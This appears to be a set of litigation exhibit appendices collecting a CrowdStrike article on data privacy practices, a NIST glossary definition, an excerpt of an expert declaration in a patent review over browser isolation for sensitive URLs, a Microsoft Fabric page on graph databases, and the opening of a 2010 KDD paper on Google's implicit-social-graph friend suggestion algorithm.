- Canada's Personal Information Protection and Electronic Documents Act (PIPEDA)
- The California Online Privacy Protection Act (COPPA)
- The California Consumer Privacy Act (CCPA)
- The Utah Consumer Privacy Act (UCPA)

Ensuring data privacy compliance is imperative given the substantial repercussions of noncompliance. Organizations that fall short in adhering to data privacy laws expose themselves to hefty fines, significant individual penalties, and damage to reputation. In fact, an expensive fine is almost guaranteed if your organization violates a data privacy law. For example, a serious GDPR infringement can result in a fine of up to €20 million or 4% of the firm's worldwide annual revenue from the preceding financial year, whichever amount is higher.

### EXPERT TIP

**Fair information practice principles** Are you part of a government entity? If so, then take note, as fair information practice principles (FIPPs) are critical to how the government approaches information management. The FIPPs are a collection of governing principles that should be applied by each agency to address their privacy program requirements.They include:

- **Transparency:** Ensuring individuals are aware of how their data is being collected, used, and disclosed.
- **Individual participation:** Allowing individuals to have a say in what data is collected about them and how it is used.
- **Authority:** Only handling personal information — creating, collecting, using, processing, storing, maintaining, disseminating, or disclosing it — if authorized to do so.
- **Purpose specification:** Clearly defining the purposes for which personal information is collected.
- **Data minimization:** Limiting the collection of personal information to what is directly relevant and necessary for the specified purpose.
- **Access and amendment:** Ensuring individuals have proper access to their personal information and the opportunity to correct or amend it as needed.
- **Data quality and integrity:** Maintaining accurate and up-to-date personal information to the extent necessary for the intended purposes.
- **Security:** Implementing measures to protect personal information from unauthorized access, disclosure, alteration, and destruction.
- **Accountability:** Holding organizations accountable for complying with privacy principles and providing mechanisms for audits to ensure compliance.

## Data privacy challenges

Navigating the landscape of data privacy is crucial for organizations, but the path is not without hurdles. Despite its essential nature, the journey toward robust data privacy practices is marked by various challenges. Here's a glimpse into some of the key obstacles:

- **Data sprawl:** The exponential surge in enterprise data volumes propels organizations into an unyielding struggle to effectively manage their sensitive information.
- **Data visibility and discovery:** Locating sensitive data within an organization can be a complex endeavor. It's not uncommon for businesses to ask, "Where exactly is all of our sensitive data?"
- **Data breaches:** The ever-present threat of data breaches looms large. Protecting sensitive information from a data breach remains a constant concern, demanding vigilant and proactive data protection measures.
- **Keeping pace with regulations:** The regulatory landscape for data privacy is dynamic and diverse. Organizations find themselves in a race to keep up with the myriad regulations, each with their own set of compliance requirements.
- **Insider threats:** Security risks originating from within an organization pose a significant risk. Indeed, 19% of breaches. This underscores the importance of balancing trust with stringent security measures, forming a critical foundation for safeguarding against potential insider threats.

## Data privacy best practices

In today's digital business, adopting robust best practices is paramount to safeguarding sensitive information. These practices encompass a holistic approach, involving processes, governance, and cutting-edge technologies. Though the specific strategies may vary for each organization, the following best practices provide a solid foundation for building and sustaining an effective data privacy framework.

### Data encryption

Data encryption is a pivotal practice involving the conversion of sensitive information into a coded format. This process ensures that even if unauthorized access occurs, the data remains confidential. Encryption serves as a critical layer in safeguarding data privacy, providing an extra barrier against potential breaches and unauthorized disclosures.

### Implementing a zero trust model

Integrate the Zero Trust model into your organization's cybersecurity framework as a fundamental best practice. In a Zero Trust framework, trust is never assumed, and verification is required from anyone trying to access resources in the network, whether they are internal or external. This approach challenges the traditional notion of a secure perimeter and emphasizes continuous authentication, strict access controls, and the principle of least privilege. By incorporating the Zero Trust model, organizations not only improve their overall security posture but significantly enhance data privacy. This proactive approach minimizes the risk of unauthorized access, reducing the likelihood of data breaches and safeguarding sensitive information against evolving cyber threats.

### Identity and access management

Implementing a robust identity and access management (IAM) system is paramount for ensuring the confidentiality, integrity, and availability of sensitive data. IAM serves as a foundational pillar in safeguarding data privacy by controlling and managing user access to organizational resources. Establish comprehensive user authentication processes, including multi-factor authentication (MFA), to verify identities and strengthen access

controls. Regularly audit and update user permissions based on the principle of least privilege, which minimizes the risk of unauthorized access by granting individuals or systems the least amount of access necessary for their specific job duties.

### Vendor management

A robust data privacy strategy for any successful organization revolves around comprehensive vendor management to ensure that external partners and third parties within the company's ecosystem strictly adhere to data protection standards and compliance regulations. To achieve this, organizations should integrate data privacy due diligence into vendor selection, emphasizing thorough assessments during the process. It is imperative to confirm that your vendors adhere to similar high standards and requirements, fostering a cohesive and secure partner network that prioritizes data privacy throughout the business ecosystem.

### Training employees

It is imperative to educate employees on data privacy best practices, security protocols, and the critical importance of safeguarding sensitive information. By fostering a culture of privacy within the organization, employees become integral to the overall cybersecurity posture. It is essential to ensure that all employees undergo comprehensive cybersecurity training that covers the significance of safeguarding sensitive data and provides best practices for mitigating the risks of a data breach. Every employee is a potential line of defense against cyber threats, and this training not only strengthens the organization's security infrastructure but ensures a collective commitment to maintaining a secure and resilient work environment.

### Incident response plan

A robust incident response plan is essential for organizations to effectively navigate and mitigate the impact of data breaches. This plan serves as a roadmap to prevent chaos during a security incident, outlining clear action steps, roles, and responsibilities. The primary objective is to ensure a swift and organized response, minimizing business interruptions and reducing the overall cost of recovery. By incorporating regular testing and drills, organizations can refine their incident response procedures, allowing for a comprehensive and well-coordinated approach to handling cyber incidents.

### Data loss prevention

Incorporating a robust data loss prevention (DLP) strategy helps organizations safeguard sensitive information. DLP involves the implementation of specialized technologies and policies designed to monitor, detect, and block the unauthorized transmission or access of critical data. A well-designed DLP system enables real-time monitoring of data movement across networks, endpoints, and cloud storage systems, allowing for immediate intervention in the event of potential data breaches.



**CUSTOMER STORY: NIJ SMELLINGHE**

Watch this case study and learn why Nij Smellinghe relies on the AI-native CrowdStrike Falcon® platform and CrowdStrike Falcon® Complete to ensure sensitive patient data stays protected.

Watch Now

## Manage your data privacy with CrowdStrike

Adopting data privacy practices is of utmost importance for organizations, as doing so establishes a protective barrier for sensitive information. Beyond safeguarding crucial data, prioritizing data privacy nurtures customer trust and loyalty, laying the groundwork for a more resilient and trustworthy business environment. Adopting robust data privacy practices helps mitigate compliance risks and enhances an organization's reputation as a responsible and ethical brand in today's data-driven landscape.

CrowdStrike Falcon® Data Protection has been purposefully crafted to prevent breaches and preserve the privacy and integrity of sensitive information. Falcon Data Protection — a part of the CrowdStrike Falcon® platform — provides full visibility into data in motion that is classified by both content and context for faster, more accurate egress investigations, all through a unified console. Furthermore, the Falcon platform offers comprehensive visibility and protection across the most critical areas of an organization's data risk: your endpoints, workloads, data, and identity.

Narendran is a Director of Product Marketing for Identity Protection and Zero Trust at CrowdStrike. He has over 17 years of experience in driving product marketing and GTM strategies at cybersecurity startups and large enterprises such as HP and SolarWinds. He was previously Director of Product Marketing at Preempt Security, which was acquired by CrowdStrike. Narendran holds a M.S. in Computer Science from University of Kiel, Germany.

## Featured Articles




Cloud Sprawl




Data Protection vs Data Security




Data Theft Prevention

Definition
Importance
Benefits
Laws And Regulations
Challenges
Best Practices

Try CrowdStrike free for 15 days

Start free trial Contact us View pricing



Copyright © 2025 Privacy Cookies Your Privacy Choices Terms of Use Accessibility

# APPENDIX S

An official website of the United States government Here's how you know

Information Technology Laboratory

# COMPUTER SECURITY RESOURCE CENTER

Projects
Publications +
Topics +
News & Updates
Events
Glossary
About CSRC +

Search

Sort By
Relevance (best match)

Items Per Page 100

Search Reset

GLOSSARY

A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z

## sensitive information

**Definitions:**

Information, the loss, misuse, or unauthorized access to or modification of, that could adversely affect the national interest or the conduct of federal programs, or the privacy to which individuals are entitled under 5 U.S.C. Section 552a (the Privacy Act), but that has not been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy.
**Sources:**
NIST SP 800-150 under Sensitive Information

See controlled unclassified information (CUI). Note: The term sensitive information as well as others such as For Official Use Only (FOUO) and Sensitive But Unclassified (SBU) will no longer be used upon implementation of 32 CFR 2002.
**Sources:**
CNSSI 4009-2015

Sensitive but unclassified information.
**Sources:**
NIST SP 800-175B Rev. 1 under Sensitive (information)

### ABOUT

**See the identified Source document to understand each term-definition pair in its proper context.**

Send inquiries about terminology to the Source's authors; NIST publications will usually include a contact email for that Source.

For other inquiries, such as comments about the Glossary's presentation and functionality, use this link.

See the Glossary homepage for more guidance.

# APPENDIX T

UNITED STATES PATENT AND TRADEMARK OFFICE

BEFORE THE PATENT TRIAL AND APPEAL BOARD

CROWDSTRIKE, INC.,

Petitioner

v.

SKYSONG INNOVATIONS, LLC,

Patent Owner

*Inter Partes* Review Case No. IPR2025-01400

U.S. Patent No. 10,574,721

**DECLARATION OF EREZ ZADOK, Ph.D.**

I, Erez Zadok, Ph.D., declare as follows:

1. I am over the age of 21 and am competent to make this declaration. I make this declaration based on facts and matters within my own knowledge and on information provided to me by others, and, if called as a witness, I could and would competently testify to the matters set forth herein.

## I. EDUCATIONAL BACKGROUND AND QUALIFICATIONS

2. My *curriculum vitae*, which includes a more detailed summary of my background, experience and publications, is provided as EX1011.

3. I am a Professor in the Computer Science Department at Stony Brook University (part of the State University of New York ("SUNY") system). I direct the File-systems and Storage Lab (FSL) at Stony Brook's Computer Science Department. My research interests include file systems and storage systems, operating systems, transactional systems including database technologies, information technology and system administration, security/privacy and information assurance, networking, energy efficiency, performance and benchmarking, virtualization, cloud systems, compilers, applied machine learning, and software engineering.

4. I studied at a professional high school in Israel, focusing on electrical engineering ("EE"), and graduated in 1982. I spent one more year at the high school's college division, receiving a special Certified Technician's degree in EE. I

**c. "the second web content class further being associated with sensitive information presenting a security risk"**

157. Fages's data defining sensitive URLs in list $L_{i1}$ are *associated with sensitive information presenting a security risk*, such as online banking websites. Fages (EX1004), [0056], [0088] ("a sensitive site such as an Internet site enabling the management of a user's bank accounts"). Indeed, for the same reasons the '721 Patent describes a URL request to www.bankofamerica.com as "sensitive" such that a new browser handles that request for "security reasons," Fages's URLs to banking account websites, handled by a separate browser instance, are "*associated with sensitive information presenting a security risk*" as claimed.

158. For example, the '721 Patent describes www.bankofamerica.com as being a sensitive website. '721 Patent (EX1001), 4:33-5:4 ("Referring to FIG. 1, a request is made to www.bankofamerica.com. Referring back to Fig. 6, the automatic FBI system determines if the URL is sensitive at 606 and if so, the automatic FBI system redirect the first browser instance to a default page at 608."), *id.* ("In the illustrated embodiment of FIG. 1, the message indicates that the requested website handles sensitive information and that a new browser window will be opened to handle the request for security reasons."), 7:65-8:11 ("The browser could not communicate directly with www.bank.com using the actual IP address of www.bank.com because that IP address of www.bank.com is not added to the whitelist of the current instance."), 3:7-11 ("In another embodiment, the automatic

FBI implements an effective approach for providing secure access to sensitive content for a novice user, while allowing an experienced user to specify COI classes of content that can coexist in a browser instance.").

159. *Compare* '721 Patent (EX1001), 4:65-5:4 ("Referring back to FIG. 1, when a URL is sensitive, instead of displaying the requested page in the current instance browser 102, the automatic FBI system displays a message at 104. In the illustrated embodiment of FIG. 1, the message indicates that the requested website handles sensitive information and that a new browser window will be opened to handle the request for security reasons."), Figs. 1-2 *with* Fages (EX1004), [0056] ("The Internet 4 is formed by numerous Internet servers connected to one another by means of a set 6 of long-distance information-transmission networks. This set 6 incorporates especially many routers so that it can route the information delivered by a server to any terminal connected to one of the networks of the set 6. By way of an illustration, only two Internet servers 8 and 10 have been shown. The server 8 is a sensitive Internet server. The term 'sensitive' designates, in this embodiment, a server that must be protected against second type attacks. For example, the Internet server 8 is an Internet server that enables online handling of bank accounts."), [0088] ("In response, at a step 86, the server 20 creates an execution environment and launches the execution in this environment of the Internet browser identified and configured as indicated in the list Ci associated with the identifier Si acquired during

the step 84. Thus, a sensitive site such as an Internet site enabling the management of a user's bank accounts will be accessible only by means of an Internet browser whose configuration defined in the list Ci is appropriate to this use. Thus, problems of compatibility between the Internet browsers and the Internet sites consulted are avoided.").

160. A POSITA would have understood that sensitive web content such as online handling of bank accounts would have presented a security risk because a successful attack or exploit would have allowed a hacker to illicitly access a user's account to steal personal information or possibly transfer funds to another account without the user's permission, for example. *See* §VI.C above.

**d. "first web content class defining a first plurality of Uniform Resource Locators (URLs)"**

161. Fages also teaches an administrator defines "unsecured" web content ("*first web content class*") that may be accessed only via an unsecured session $S_4$ because the "unsecured session enables connection with any Internet site except the sensitive Internet sites." Fages (EX1004), [0072]. A POSITA would have understood that the "sensitive Internet sites" in Fages refer to the sensitive/secure websites in lists $L_{i1}$. In one example, Fages teaches a user browsing in "an unsecured

# APPENDIX U

Case 2:25-cv-00098-JRG Document 67-3 Filed 03/31/26 Page 367 of 433 PageID #: 7677

# What is a graph database?

ⓘ Note

This feature is currently in public preview. This preview is provided without a service-level agreement, and isn't recommended for production workloads. Certain features might not be supported or might have constrained capabilities. For more information, see Supplemental Terms of Use for Microsoft Azure Previews.

A graph database models data as a network of connected entities and relationships. The most commonly used type of graph database implements the labeled property graph model: entities (nodes) and relationships (edges) can have labels and properties (key–value pairs). This flexible model enables both schema-optional and schema-driven designs, and it lets you express rich semantics. Because connections are stored explicitly as edges, queries traverse relationships by following edges instead of computing expensive joins at query time.

ⓘ Important

This article exclusively uses the social network example graph dataset.

## Graph database core concepts

- Nodes represent things such as people, products, or places. Nodes can have labels and properties that describe their attributes.
- Edges represent how those things are connected, for example FRIENDS_WITH, PURCHASED, or LOCATED_IN. Edges can also carry properties and labels to encode relationship metadata.
- Properties attach details to nodes and edges (for example, a person's name or an edge's since date). Because relationships are stored explicitly as edges, queries navigate the graph by following connections rather than computing them at query time.

## How querying relationships works

Graph queries retrieve connected information by traversing from a starting node to its neighbors, then to their neighbors, and so on. The effort a traversal performs is tied to the number of edges it touches (the local neighborhood), not the total size of the dataset. This makes questions about paths, connections, and patterns—such as *friends of friends*, shortest paths, or multi-hop dependencies—natural and efficient to express.

Graph databases use pattern-based query languages, such as the increasingly adopted **Graph Query Language (GQL)**, to describe these traversals concisely. GQL is being standardized by the same international working group that oversees SQL (ISO/IEC 39075), aligning graph querying with established database standards.

**Example (pattern matching with GQL):**

```gql
MATCH (p:Person {firstName: "Annemarie"})-[:knows]->(friend)-[:likes]->(c:Comment)
RETURN c
ORDER BY c.creationDate
LIMIT 100
```

This pattern reads as: starting at the Person node for Annemarie, follow `:knows` edges to each friend, then follow `:likes` edges to related `:Comment` nodes, and return the 100 newest of those comments.

## Modeling and schema

Graph data models are schema-optional: you can work with a fixed schema when you need strong governance, or evolve the model as new node types, relationships, or properties appear. This approach reduces the need for data duplication and lets teams unify data from multiple sources without heavy upfront redesign.

## Common uses for graph databases

Graph databases align closely with domains where connections drive value, such as social networks, knowledge graphs, recommendation systems, fraud and risk networks, network and IT topology, and supply chain dependency analysis. In these scenarios, questions are less about single records and more about how many entities relate and interact over several hops.

## When to consider a graph database

Choose a graph database when your primary questions involve paths, neighborhoods, and patterns in connected data; when the number of hops is variable or not known in advance; or when you need to combine and navigate relationships across disparate datasets. If those are the questions you need to answer repeatedly, a graph model is a natural fit.

## What about ETL

Representing your data as a graph and storing it in a separate, standalone graph database often introduces ETL and governance overhead. By contrast, graph in Microsoft Fabric operates directly on OneLake, which reduces or eliminates the need for separate ETL pipelines and data duplication. Consider these tradeoffs:

- **Data movement and duplication**: Standalone graph databases typically require extracting, transforming, and loading (ETL) data into a separate store, which increases complexity and can lead to duplicated datasets. Graph in Microsoft Fabric operates on OneLake so you can model and query connected data without moving it.
- **Operational costs**: Standalone graph stacks run as separate clusters or services and often carry idle-capacity charges. Graph workloads in Fabric consume pooled capacity units (CUs) with automatic scale-down and centralized metrics, which simplifies operations and can lower cost.
- **Scalability**: Some standalone graph databases depend on scale-up or vendor-specific clustering. Graph in Microsoft Fabric is designed for large-scale graphs and uses scale-out sharding across multiple workers to handle big-data workloads efficiently.
- **Tooling and skills**: Vendor-specific graph systems can require specialized languages and separate analytics frameworks. Graph in Microsoft Fabric provides unified modeling, standards-based querying (GQL), built-in graph analytics algorithms, BI and AI integration, and low/no-code exploratory tools so a broader set of users can work with connected data.
- **Governance and security**: Separate graph deployments need independent governance and security setups. Graph in Microsoft Fabric uses OneLake governance, lineage, and workspace role-based access control (RBAC) so compliance, auditing, and permissions remain consistent with the rest of your Fabric environment.

Case 2:25-cv-00098-JRG Document 67-3 Filed 03/31/26 Page 368 of 433 PageID #: 7678

## Related content

- Compare graph and relational databases
- Try Microsoft Fabric for free

Last updated on 11/18/2025

# APPENDIX V

Check for updates

Latest updates: https://dl.acm.org/doi/10.1145/1835804.1835836

RESEARCH-ARTICLE

# Suggesting friends using the implicit social graph

**MAAYAN ROTH**, Google LLC, Africa & Middle East, Dubai, Dubai, United Arab Emirates

**ASSAF BEN-DAVID**, Google LLC, Africa & Middle East, Dubai, Dubai, United Arab Emirates

**DAVID DEUTSCHER**, Google LLC, Africa & Middle East, Dubai, Dubai, United Arab Emirates

**GUY FLYSHER**, Google LLC, Africa & Middle East, Dubai, Dubai, United Arab Emirates

**ILAN HORN**, Google LLC, Africa & Middle East, Dubai, Dubai, United Arab Emirates

**ARI LEICHTBERG**, Google LLC, Africa & Middle East, Dubai, Dubai, United Arab Emirates

**View all**

**Open Access Support** provided by:

**Google LLC, Africa & Middle East**

**PDF Download**
**1835804.1835836.pdf**
**09 January 2026**
**Total Citations:** 151
**Total Downloads:** 2443

**Published:** 25 July 2010

**Citation in BibTeX format**

KDD '10: The 16th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining
*July 25 - 28, 2010*
*DC, Washington, USA*

**Conference Sponsors:**
SIGMOD
SIGKDD


https://doi.org/10.1145/1835804.1835836
ISBN: 9781450300551

# Suggesting Friends Using the Implicit Social Graph

Maayan Roth
mroth@google.com

Assaf Ben-David
abenda@google.com

David Deutscher
dudo@google.com

Guy Flysher
guyfl@google.com

Ilan Horn
ilan@google.com

Ari Leichtberg
aril@google.com

Naty Leiser
naty@google.com

Yossi Matias
yossi@google.com

Ron Merom
ronme@google.com

Google, Inc.
Israel R&D Center

## ABSTRACT

Although users of online communication tools rarely categorize their contacts into groups such as "family", "co-workers", or "jogging buddies", they nonetheless implicitly cluster contacts, by virtue of their interactions with them, forming *implicit groups*. In this paper, we describe the *implicit social graph* which is formed by users' interactions with contacts and groups of contacts, and which is distinct from explicit social graphs in which users explicitly add other individuals as their "friends". We introduce an interaction-based metric for estimating a user's affinity to his contacts and groups. We then describe a novel friend suggestion algorithm that uses a user's implicit social graph to generate a friend group, given a small seed set of contacts which the user has already labeled as friends. We show experimental results that demonstrate the importance of both implicit group relationships and interaction-based affinity ranking in suggesting friends. Finally, we discuss two applications of the Friend Suggest algorithm that have been released as Gmail Labs features.

## Categories and Subject Descriptors

H.5.3 [**Information Systems**]: Information Interfaces and Presentation—*Group and Organization Interfaces*;
I.5.3 [**Computing Methodologies**]: Pattern Recognition—*Clustering*

## General Terms

Algorithms, Human Factors

## Keywords

Implicit social graph, tie strength, contact group clustering.

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee.
*KDD'10,* July 25–28, 2010, Washington, DC, USA.
Copyright 2010 ACM 978-1-4503-0055-1/10/07 ...$10.00.

## 1. INTRODUCTION

One benefit of many online communication channels over offline methods is that they enable communication among groups of people, rather than restricting communication to be peer-to-peer. Email is just one format that supports group conversations, but there are many others, such as photo- and link-sharing, and collaborative document editing. In fact, group communication is so prevalent that our analysis of the Google Mail email network shows that over 10% of emails are sent to more than one recipient, and over 4% of emails are sent to 5 or more recipients. Within enterprise domains, group communication is even more critical. An analysis of the email network of Google employees showed that over 40% of emails are sent to more than one recipient, and nearly 10% are sent to 5 or more recipients.

As opposed to broadcast-style media, such as blogs[1] and micro-blogging platforms like Twitter[2], the information communicated by an individual to a limited group is generally carefully targeted, and may be private. The recipient lists for small-group communications such as emails are selectively constructed by the message senders. We have observed that users tend to communicate repeatedly with the same groups of contacts. This observation has prompted many online communication platforms to provide their users with tools for creating and saving groups of contacts. Some examples are the Google Mail Contact Manager[3], or custom friends lists on Facebook[4].

Despite the prevalence of group communication, users do not often take the time to create and maintain custom contact groups. One survey of mobile phone users in Europe showed that only 16% of users have created custom contact groups on their mobile phones [12]. In our user studies, users explain that group-creation is time consuming and tedious. Additionally, groups change dynamically, with new individuals being added to multi-party communication threads and others being removed. Static, custom-created groups can quickly become stale, and lose their utility.

In this paper, we present a friend-suggestion algorithm that assists users in the creation of custom contact groups,

---

[1] e.g. http://www.blogger.com, http://www.wordpress.com
[2] http://www.twitter.com
[3] http://mail.google.com/support/bin/answer.py?hl=en&answer=30970
[4] http://www.facebook.com/help/#/help.php?page=768

either implicit or explicit. This algorithm is based on analysis of the *implicit social graph*, which is the social network that is defined by interactions between users and their contacts and groups of contacts. We differentiate the implicit social graph from explicit social graphs that are formed by users explicitly adding other individuals as "Friends". The implicit social graph is a weighted graph, where edge weights are determined by the frequency, recency, and direction of interactions between users and their contacts and groups. Our measure of tie strength differs from previous work in that we consider group interactions, as well as peer-to-peer.

We use the implicit social graph to identify clusters of contacts who form groups that are meaningful and useful to each user. Unlike some previous research on contact clustering, we do not consider the content of interactions. Additionally, because the email network that we have studied is private, we do not consider any friend-of-friend ties, either when computing edge weights for the graph, or when computing contact clusters.

Given a user's social network with weighted edges and an initial seed of a few contacts, our friend-suggest algorithm builds a custom contact group that accurately expands the seed. We evaluate the efficacy of our algorithm by comparing to baseline approaches via precision-recall measurements. We show two applications of this algorithm, implemented as Gmail Labs features, called "Don't forget Bob!" and "Got the wrong Bob?" Although our discussion centers around an email network, the network analysis that we have done is applicable to any implicit social graph that is formed by interactions between users and their contacts.

## 2. CHARACTERISTICS OF THE EMAIL IMPLICIT SOCIAL GRAPH

The Google Mail implicit social graph is composed of billions of distinct nodes, where each node is an email address. Edges are formed by the sending and receiving of email messages. For the purpose of our work, we consider a message sent from a user to a group of several contacts as forming a single edge, thereby constructing a directed hypergraph. We call the hypergraph composed of all of the edges leading into or out of a single user node that user's *egocentric network*. We call each hyperedge an *implicit group*, even though it may consist of a single contact. On average, a typical 7-day active user has 350 implicit groups in his egocentric network, with groups containing an average of 6 contacts. Note that this does not imply that the average user has thousands of distinct contacts. Rather, each implicit group is a unique combination of one or more contacts with whom the user has interacted.

Edges in the implicit social graph have both direction and weight. The direction of an edge is determined by whether it was formed by an outgoing email sent by the user, or an incoming email received by the user. There may be both outgoing and incoming edges joining a user and an implicit group, if the user has both sent and received email from the group. We consider a user to have received mail from a group by joining the sender of the mail and the other co-recipients into an implicit group. Thus, if a contact $c_1$ sent mail to the user $u$ and contacts $c_2$ and $c_3$, this is represented in $u$'s egocentric network as an incoming edge from the group $\{c_1, c_2, c_3\}$ to $u$.

The weight of an edge is determined by the recency and frequency of email interactions between the user and the group. In Section 3.1, we propose one metric for computing edge weight, which we call *Interactions Rank*. We claim that edge weight is an important indicator of the strength of the relationship between the user and a particular group. In the remainder of this paper, we use the terms *edge weight*, *group weight*, and *group importance* interchangeably.

In our work, we draw a sharp distinction between each user's egocentric network and the global or *sociocentric* network that is formed by combining the networks of all users. Although other researchers have found value in clustering contact groups by looking at friend-of-friend edges (e.g. [9]), we restrict our algorithm to look only at a single user's egocentric network during friend suggestion. By showing users suggestions based only on their local data, we are able to protect user privacy and avoid exposing connections between the user's contacts that might not otherwise have been known to him.

The social graph studied in this paper is constructed using the metadata (i.e. timestamp, sender, and recipients) of outgoing and incoming messages set or received via Google Mail; message content is not included or examined. For the purposes of this research, we used a random sample of the metadata from thousands of interactions, and data was looked at exclusively in aggregate. The experimental results in Section 4 were gathered with the same privacy protections that are used in all Google software development[5] to ensure that developers do not intentionally or unintentionally access contact information about specific users without their explicit consent.

## 3. FRIEND SUGGEST

Our algorithm is inspired by the observation that, although users are reluctant to expend the effort to create explicit contact groups, they nonetheless implicitly cluster their contacts into groups via their interactions with them. For example, while a user may have multiple, possibly overlapping, subgroups of coworkers with whom he exchanges emails, he is unlikely to include his family members in those interactions. The Friend Suggest algorithm, described in this section, detects the presence of implicit clustering in a user's egocentric network by observing groups of contacts who are frequently present as co-recipients in the same email threads. The input to Friend Suggest is a *seed*, which is a small set of one or more contacts that belong to a particular group. This seed could be labeled by the user selecting a few contacts, e.g., as an initial list in the "To:" field of an email. Given this seed, Friend Suggest finds other contacts in the user's egocentric network who are related to the seed, meaning that they are present in the same implicit clusters. Friend Suggest also returns a score for each suggested contact, indicating the goodness of its fit to the existing seed.

The algorithm described in this section is applicable to the problem of group clustering in any interaction-based social graph. For clarity and convenience, we describe it in terms of email interactions.

### 3.1 Interactions Rank

The first requirement of the Friend Suggest algorithm is an implicit social graph with edges whose weights represent the relationship strength between a user and his implicit

[5]http://mail.google.com/mail/help/privacy.html

groups. We wish to compute edge weights that satisfy the following three criteria:

1. Frequency: Groups with which a user interacts frequently are more important to the user than groups with which he interacts infrequently.
2. Recency: Group importance is dynamic over time.
3. Direction: Interactions that the user initiates are more significant than those he did not initiate.

Regarding recency, we observe that a group with which the user is actively interacting now is more important than one with which the user last interacted a year ago. Overall, recent interactions should contribute more to group importance than interactions in the past. We also note that receiving an email from a contact, a passive interaction, is a weaker signal of closeness than the active interaction of sending an email to that contact. In the most extreme case, we want to be able to rank spammer contacts, from whom the user receives many emails but to whom he sends none, very low in importance.

To satisfy these criteria, we propose Interactions Rank, a metric computed by summing the number of emails exchanged between a user and a particular implicit group, weighting each email interaction as a function of its recency. Interaction weights decay exponentially over time, with the half-life, $\lambda$, serving as a tunable parameter. An additional parameter that can be tuned in Interactions Rank is $\omega_{out}$, the relative importance of outgoing versus incoming emails.

Interactions Rank (sometimes abbreviated $\mathcal{IR}$) is computed over a set of email interactions $I = \{I_{out}, I_{in}\}$, according to the following equation:

$$\mathcal{IR} \leftarrow \omega_{out} \sum_{i \in I_{out}} \left(\frac{1}{2}\right)^{\frac{t_{now} - t(i)}{\lambda}} + \sum_{i \in I_{in}} \left(\frac{1}{2}\right)^{\frac{t_{now} - t(i)}{\lambda}}$$

where $I_{out}$ is the set of outgoing interactions between a user and a group, and $I_{in}$ is the set of incoming interactions, $t_{now}$ is the current time, and $t(i)$ is the timestamp of an interaction $i \in I$. Note that according to this equation, an interaction from the current time has a contribution of 1 to a group's Interactions Rank, whereas an interaction from one half-life $\lambda$ ago contributes $\frac{1}{2}$ and so on.

Interactions Rank is related to the Recency metric proposed by Carvalho and Cohen [5]. However, Interactions Rank calculates the weight of each interaction according to its timestamp, while Recency sorts interactions in chronological order, and weights them on an exponentially decaying scale computed over their ordinal rank. Additionally, Recency does not take into account the direction of each interaction. Ting *et al.* propose an edge-weight metric that considers the role of the interaction participant, but does not take into account the time of the interaction [18].

It should be noted that Interactions Ranks do not easily allow for comparisons across several users. A very active user, who sends and receives many emails per day, will have overall higher Interactions Ranks for his implicit groups than a relatively inactive user. However, within a single user's egocentric network, Interactions Rank allows for a clean ordering of the user's implicit groups by estimated relationship strength. We are actively working on incorporating other signals of importance, such as the percentage of emails received from a contact that the user chooses to read.

## 3.2 Core Routine

The core routine of the Friend Suggest algorithm, ExpandSeed is shown in Table 1.

```
function ExpandSeed(u, S):
  input: u, the user
         S, the seed
  returns: F, the friend suggestions

  1. G ← GetGroups(u)
  2. F ← ∅
  3. for each group g ∈ G:
  4.    for each contact c ∈ g, c ∉ S:
  5.      if c ∉ F:
  6.        F[c] ← 0
  7.      F[c] +← UpdateScore(c, S, g)
```

**Table 1: Core algorithm for suggesting contacts that expand a particular seed, given a user's contact groups.**

The ExpandSeed function takes as inputs a user, $u$, who is the mailbox owner of a single egocentric network in the implicit social graph, and a seed, $\mathcal{S}$, consisting of a set of contacts that make up the group to be expanded. ExpandSeed returns a set of friend suggestions, $\mathcal{F}$, which maps each suggested contact to a score. Each contact's score indicates the algorithm's prediction for how well that given contact expands the seed, relative to the other contacts in $u$'s network. Note that not all contacts from $u$'s network are guaranteed to be returned in $\mathcal{F}$.

Friend suggestions are computed as follows: The user $u$'s egocentric network is extracted from the implicit social graph. The network, $\mathcal{G}$, is represented as a set of contact groups, where each group $g \in \mathcal{G}$ is a set of contacts with whom $u$ has exchanged emails. Each group $g$ has an Interactions Rank, computed as described in Section 3.1, indicating the strength of $u$'s connection to the group $g$. The goal of ExpandSeed is to find, among all the contacts in $\mathcal{G}$, those whose interactions with $u$ are most similar to $u$'s interactions with the contacts in the seed $\mathcal{S}$.

ExpandSeed iterates over each group $g$ in $\mathcal{G}$, computing a score for each contact $c$ that is a member of $g$. The algorithm does not suggest contacts that are already members of the seed $\mathcal{S}$. Scores for each contact are computed iteratively via a helper function, UpdateScore, which takes the contact being considered, the contact's score so far, $\mathcal{F}[c]$, the seed $\mathcal{S}$, and the group $g$. In the following section, we discuss several possible scoring heuristics that were considered for UpdateScore.

## 3.3 Scoring Functions

UpdateScore is a function template that takes a single contact, $c$, from a user $u$'s egocentric network and an implicit group $g$ to which $c$ belongs, and returns an incremental score based on the group $g$'s similarity to the seed group, $\mathcal{S}$. The sum of UpdateScore for a contact $c$ over all of the implicit groups to which it belongs is an estimate of $c$'s fitness to expand the seed. Because both the implicit groups making up an egocentric network and the seed group that is the input to Friend Suggest are unordered sets of contacts, they can be compared via standard measures of set similarity [19]. In

this work, we look only at set member intersection, leaving more complex metrics for future exploration. We define below several implementations of UPDATESCORE. In the next section, we evaluate their relative merits.

The most basic instantiation of UPDATESCORE, shown in Table 2, simply returns a group $g$'s Interactions Rank if the group has a non-empty intersection with the seed set.

```
function IntersectingGroupScore(c, S, g):
  input: c, a single contact
         S, the seed being expanded
         g, a single contact group
  returns: g's contribution to c's score

  1. if g ∩ S ≠ ∅:
  2.    return IR(g)
  3. else:
  4.    return 0
```

**Table 2: An implementation of UpdateScore that sums the scores of all of the groups to which that contact belongs, for groups that have a non-empty intersection with the seed.**

Intuitively, INTERSECTINGGROUPSCORE finds all the contexts in which the proposed contact $c$ exchanged emails or was a co-recipient with at least one seed group member. However, a larger intersection between the members of the seed group and the members of a given implicit group seems to indicate a higher degree of similarity. Table 3 shows a metric, INTERSECTIONWEIGHTEDSCORE, that takes this into account.

```
function IntersectionWeightedScore(c, S, g):
  input: c, a single contact
         S, the seed being expanded
